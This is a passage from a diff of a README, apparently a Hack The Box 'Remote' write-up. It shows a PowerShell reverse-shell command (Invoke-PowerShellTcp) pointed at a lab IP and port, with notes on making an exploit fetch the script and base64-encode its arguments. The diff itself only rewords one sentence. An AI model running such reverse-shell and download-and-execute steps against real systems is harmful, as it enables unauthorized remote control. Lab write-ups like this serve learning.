vipertooth/HTB-Remote/Readme.md

 Invoke-PowerShellTcp -Reverse -IPAddress 10.10.17.215 -Port 9003
 ```

 I changed the file name to r2.ps1 to make it easy to use.
-To get the exploit to call this file we will need to change the script to call back and grab the reverse shell.
+To get the exploit to call this file I had to change the script to call back and grab the reverse shell.
 To make sure there is no issues being sent over http it is best to base64 encode the arguments string.
 To do with I will open powershell on Kali and create the encoded string.

 ```bash
 root@HTBKali:~/HTB/Remote# pwsh